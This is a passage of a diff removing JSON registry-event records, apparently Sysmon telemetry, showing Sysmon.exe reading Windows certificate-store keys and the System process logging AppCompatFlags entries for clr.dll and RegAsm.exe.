"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", 
- "registry_value": "CRLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866360000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 4, - "process_name": "System", - "process_path": "System", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319/clr.dll", - "registry_value": "clr.dll", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" - }, - { - "event_type": "registry", - "pid": 4, - "process_name": "System", - "process_path": "System", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319/clr.dll\\\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework\\v4.0.30319", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319/clr.dll\\\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "registry_value": "RegAsm.exe", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570866360000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866360000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - 
"registry_value": "CTLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866530000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 